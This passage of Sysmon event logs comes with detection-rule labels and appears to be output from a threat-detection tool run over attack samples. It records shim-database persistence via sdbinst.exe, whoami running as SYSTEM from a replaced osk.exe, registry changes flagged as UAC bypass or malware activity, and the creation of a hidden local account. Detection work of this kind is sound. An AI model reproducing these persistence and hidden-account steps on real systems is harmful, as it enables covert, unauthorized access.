(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 
21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"}},"Version":2}}}},{"detection":["OceanLotus Registry 
Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 
23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution":{"#attributes":{"ProcessID":988,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 